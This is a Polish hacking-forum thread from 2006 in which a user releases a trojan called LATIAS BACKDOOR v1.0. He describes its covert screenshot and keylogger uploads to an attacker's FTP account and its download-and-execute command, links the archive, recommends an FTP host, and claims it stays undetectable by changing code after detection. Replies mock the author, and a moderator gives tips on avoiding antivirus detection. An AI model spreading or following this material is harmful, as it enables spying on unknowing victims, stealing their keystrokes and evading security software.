LATIAS BACKDOOR v1.0

-LATIAS-

Użytkownik
Dołączył
Luty 22, 2006
Posty
15
OCEŃIE I JAK CHCECIE TO WYKORZYSTAJCIE
<


LATIAS BACKDOOR v1.0

KOMENDY

info - serwer wysyła screenshot i wpisane klawisze na podane wcześniej konto ftp
cd - ,,klasyka" czym byłby backdoor gdyby nie umiał otworzyć cd? Very Happy
ftp - serwer ściąga wrzucony wcześniej na serwer plik do c:plik.exe (musi mieć on nazwe plik.exe)
ftp open - serwer otwiera ściągnięty c:plik.exe
close - zamkniecie systemu


KLIENT
Co tu tłumaczyć? najpierw piszemy do serwera komendę info, a potem (po jakiś 10 sekundach)
wciskamy przycisk ,,POBIERZ INFO Z FTP". W zakładce obraz pojawi nam sie aktualny obraz pulpitu
zainfekowanego kompa, a w klawisze wszystko co zostało wpisane od startu systemu.

DAJĘ WAM ŹRÓDŁA ALE TYLKO W CELACH EDUKACYJNYCH. JEŻELI ZOBACZĘ, ŻE JAKAŚ LAMA ZMIENIŁA
W NICH TYLKO NAZWĘ PROGRAMU I KOLOR TŁA, PO CZYM NAZWAŁA GO SWOIM DZIEŁEM WIĘCEJ ŻADNYCH
ŹRÓDEŁ NIE BĘDZIE.


Program jest bardzo prosty. Możnaby powiedzieć, że lamerski, ale jest to moja pierwsza produkcja
i ciągle się uczę. Jeżeli ktoś chciałby mi pomóc przy pisaniu tego backdoorka, będę bardzo
wdzięczny. Aktualnie interesowałaby mnie informacja jak zrobić prosty menadżer plików taki jak
w Prosiaku czy Wspomagaczu i konfigurator serwera gdyż czytam i czytam, ale nie mogę zrozumieć
jak to zrobić (tzn wywala mi jakieś błedy przy kompilowaniu). Klient jest przerobionym GGClonem
ponieważ nie wiedziałem jak zrobić program który obsługiwałby kilka serwerów ;p.
A i jeszcze coś. Są to chyba pierwsze źródła backdoora opartego na tgglite wypuszczone w net:)

O I JESZCZE COŚ! KONTO FTP POLECAM ZAŁOŻYĆ NA WWW.HOST.SK (sprawdzone)
NA DZIEŃ 19.02.06 LATIAS BACDOOR v1.0 jest niewykrywalny i będzie tak bardzo długo gdyż
po wykryciu go wystarczy zmienić cokolwiek w kodzie serwera i zabawa zacznie się od nowa Wink



POZDROWIENIA I PODZIĘKOWANIA DLA:
Falcon i Rfl
www.unitedcrew.net
www.haker.com.pl


KONTAKT ORAZ KOMENTARZE - [email protected] http://latias7.w.interia.pl/ oraz WWW.LATIAS.FORA.PL - ZAPRASZAM Smile


Nie chciało mi sie pisać więc wkleiłem wszystko z readme które dołączam do źródeł
Diabelek

A tak wogóle to mój pierwszy pościk. Hey wszystkim Smile.
Szukam ludzi do pomocy przy prowadzeniu forum www.latias.fora.pl
Oczywiście dam im moderatorów. Jak ktoś jest zainteresowany to pisać
na maila lub priva.

Program można ściągnąć z mojej strony ale jest również bezpośrednio pod adresem:
www.latias.host.sk/latias1.rar
link żeby działał należy przekleić, nie wiem czemu, ale tak musi być ;p

NA unitedcrew nie docenili tego że udostępniłem te źródełka, mam nadzieje że chociaż wy powiecie coś miłego :-D

Uznałem że możnaby go przykleić gdyż te źródła zawierają schemat prostego backdoora wykorzystującego tgglite. Żeby działało musicie mieć komponenty indy9, keyspyxp i tgglite
www.latias.host.sk/tgglite.rar
keyspy jest na 4programmers.net a indy są darmowe, po prostu wpiszcie w google indy 9
 

K_M_X

Użytkownik
Dołączył
Styczeń 1, 2006
Posty
4
Tak tak napisales to juz na innym forum...
Co to mi za TWOJ program? Kopiowac procedury i wklejac to kazdy umie.
I nie mow ze serwer zrobiles sam? Oj naprawde? No i co z tego?A jak zrobiles? Czytales faq i kopiowales kod zmieniajac pare linijek? Zgadlem?
"DAJĘ WAM ŹRÓDŁA ALE TYLKO W CELACH EDUKACYJNYCH. JEŻELI ZOBACZĘ, ŻE JAKAŚ LAMA ZMIENIŁA
W NICH TYLKO NAZWĘ PROGRAMU I KOLOR TŁA, PO CZYM NAZWAŁA GO SWOIM DZIEŁEM WIĘCEJ ŻADNYCH
ŹRÓDEŁ NIE BĘDZIE. "
Tutaj to sie sam osmieszasz czlowieku.
I nie mow ze jest niewykrywalny Tak pod av chyba z ustawiona normalna heurystyka, nod go wykrywa BEZ PROBLEMU.
A tak w ogole no to co z tego ze sa to pierwsze zrodla? PHEW tez mi cos wystarczy MINIMALNA i PODSTAWOWA wiedza zeby napisac o wiele lepsze rzeczy i pozyteczne niz jakies trojany przy uzyciu kursu.
NIE WIEM na co to komu.
A tak btw. to jak ty chcesz ten serwer konfigurowac? LOL HAHA! bedziesz kazdemu przesylal zmeniony specialnie dla niego kod ;D?
Nawet keylogger przy uzyciu komponentu.A co to hooka nie umiesz zalozyc?
"ftp - serwer ściąga wrzucony wcześniej na serwer plik do c:plik.exe (musi mieć on nazwe plik.exe)
ftp open - serwer otwiera ściągnięty c:plik.exe "
LOL robiles to na gotowych zrodlach i nie umiales nawet tego zmienic? LOL plik.exe
 

-LATIAS-

Użytkownik
Dołączył
Luty 22, 2006
Posty
15
Dałem źródła żeby każdy mógł to sobie skonfigurować dla własnych potrzeb. A z komponentem keyspyxp wszystko jest bardziej uproszczone. Hooka umiem założyć ale po prostu wybrałem komponent. serwer sprawdzałem na virusscan.jotti.org i na tej podstawie napisałem że jest niewykrywalny. Program może nie jest jakoś zajebiście rozbudowany ale może posłużyćdo podglądania systemu, ma w końcu bez zarzutu działającą funkcję obraz i klawisze. W necie nie ma żadnego faq o pisaniu trojana pod tgglite wiec nie wiem o co ci chodzi. Pisze nastepną wersję i mam w niej zamiar dac menadżer plików i konfigurator. Myślę że wtedy bedzie lepiej
<
 

K_M_X

Użytkownik
Dołączył
Styczeń 1, 2006
Posty
4
lol? To zes mnie powalil.
Niema w necie zadnego arta o pisaniu trojanow przez gglite? lub hgg? LOL tego jest multum.
A pozatym nie twierdze ze pisales to z arta ale na 500% ci ktos inny pomagal a ty go pytales o procedury.
Polecam poduczyc sie delphi kupic sobie jakas ksiazke, np kompemedium programisty adama boducha.
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
W necie nie ma żadnego faq o pisaniu trojana pod tgglite wiec nie wiem o co ci chodzi.[/b]
A jeden temat nizej patrzales?, nawet temat jest przyklejony. A jak nie trafisz bo pewnie nie bedzie ci sie chciało trafić to patrz tutaj

serwer sprawdzałem na virusscan.jotti.org[/b]
nie skanuj na takich stronach, bo pare dni puzniej program jest wykrywalny.
 
Do góry Bottom